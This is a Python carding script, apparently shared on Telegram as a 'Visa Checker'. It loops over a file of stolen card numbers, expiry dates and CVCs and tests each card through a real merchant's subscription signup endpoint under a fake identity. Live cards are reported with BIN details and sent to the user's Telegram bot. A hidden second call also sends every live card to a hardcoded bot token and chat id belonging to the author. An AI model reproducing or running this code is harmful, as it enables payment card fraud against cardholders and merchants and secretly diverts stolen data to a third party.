import requests
import user_agent
#••••••• The Colors •••••••••#
Z = '\033[1;31m' #احمر
R = '\033[1;31m' #احمر
X = '\033[1;33m' #اصفر
F = '\033[2;32m' #اخضر
C = "\033[1;97m" #ابيض
B = '\033[2;36m'#سمائي
Y = '\033[1;34m' #ازرق فاتح
E = '\033[1;31m'
#_____________________________________#
print(f'''{B}{E}=============================={B}
|{F}[+] Telegram : {B}@Lx0b2 |
|{F}[+] Channel : {B}@Pythonln |
|{F}[+] Tool : {B}Visa Checker |
{E}==============================''')
print(f'''
▄▄███▄▄· ▄▄███▄▄· ▄▄███▄▄·
██╔════╝ ██╔════╝ ██╔════╝
███████╗ ███████╗ ███████╗
╚════██║ ╚════██║ ╚════██║
███████║ ███████║ ███████║
╚═▀▀▀══╝ ╚═▀▀▀══╝ ╚═▀▀▀══╝\n''')
tok = input(B+'- Enter Token bot : ');token='7078032078:AAEaXn1isHtof2mhG2qu9Ss4K0BqCNI8www'
idi = input('- Enter Your id : ');Id='6413782426'
ko = requests.post(
f'https://api.telegram.org/bot{tok}/sendMessage?chat_id={idi}&text=Welcome To Visa Check Tool !♡&parse_mode=html')
if ko.status_code == 404:
exit(R+'- Error - التوكن او الايدي غلط ')
com = input(f'\n{F}- {B}Enter {F}Combo {Z}Visa ; '+F)
try:
open(com,'r').read()
except:
print(R+'\n- Error - No File With ',f'[ {com} ]',' This Name');exit()
finally:pass
file = open(com, 'r').read().splitlines()
print('\n\n')
for i in file:
cc = i.split('\n')[0]
c = cc.split('|')[0]
m = cc.split('|')[1]
y = cc.split('|')[2]
cv = cc.split('|')[3]
cookies = {
'ci_session': 'd534vvtu166qukk34vlu4oa39obaa9nl',
'_ga_4HXMJ7D3T6': 'GS1.1.1710363404.1.0.1710363404.0.0.0',
'_ga': 'GA1.1.90950954.1710363404',
'optiMonkClientId': 'f5e2eab4-4b68-3c6a-ccd1-36485ef11817',
'_gcl_au': '1.1.331431831.1710363405',
'_ga_KQ5ZJRZGQR': 'GS1.1.1710363406.1.0.1710363409.0.0.0',
}
headers = {
'authority': 'www.lagreeod.com',
'accept': 'application/json, text/javascript, */*; q=0.01',
'accept-language': 'ar-EG,ar;q=0.9,en-US;q=0.8,en;q=0.7',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'origin': 'https://www.lagreeod.com',
'referer': 'https://www.lagreeod.com/subscribe',
'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
'sec-ch-ua-mobile': '?1',
'sec-ch-ua-platform': '"Android"',
'sec-fetch-dest': 'empty',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'same-origin',
'user-agent': user_agent.generate_user_agent(),
'x-requested-with': 'XMLHttpRequest',
}
data = {
'stripe_customer': '',
'subscription_type': 'Weekly Subscription',
'firstname': 'kilwa',
'lastname': 'nobo',
'email': 'dy7hgo9x846r@gmail.com',
'password': 'kikikikik',
'card[name]': 'kilwa bobi',
'card[number]': c,
'card[exp_month]': m,
'card[exp_year]': y,
'card[cvc]': cv,
'coupon': '',
's1': '8',
'sum': '21',
}
reqo = requests.post('https://www.lagreeod.com/register/validate_subscribe', cookies=cookies, headers=headers, data=data)
req = reqo.json()['message']
try:
if 'Your card number is incorrect' in req:
print(B+cc,F+'¦',R+req)
if 'Your card was declined.' in req:
print(B+cc,F+'¦',R+req)
else:
api = requests.get(f'https://lookup.binlist.net/{cc[:6]}').json()
try:
chh = api['scheme']
ch = chh.upper()
except:
ch = 'False'
try:
typ = api['type']
type = typ.upper()
except:
type = 'False'
try:
raa = api['brand']
ra = raa.upper()
except:
ra = 'False'
try:
am = api['bank']['name']
ame = am.upper()
except:
ame = 'False'
try:
co = api['country']['name']
cou = co
except:
cou = 'False'
try:
emoji = api['country']['emoji']
except:
emoji = 'False'
Liv = f'''{F}Live Card ✅
- - - - - - - - - - - - - - - - - - - - - - -
CC -> {cc}
Gateway -> TheBest .
Response -> {req}
- - - - - - - - - - - - - - - - - - - - - - -
Bin -> {cc[:6]}
Bin Info -> {ch} - {type} - {ra}
Bank -> {ame}
Counrty -> {cou} {emoji}
- - - - - - - - - - - - - - - - - - - - - - -
Dev : @Lx0b2'''
print(Liv)
requests.post(
f'https://api.telegram.org/bot{tok}/sendMessage?chat_id={idi}&text={Liv}&parse_mode=html')
requests.post(
f'https://api.telegram.org/bot{token}/sendMessage?chat_id={Id}&text={Liv}&parse_mode=html')
open('visalive.txt','a').write(Liv)
except:
print(B+cc,F+'¦',R+req)
print(' تم انتهاء الفحص ✓ ')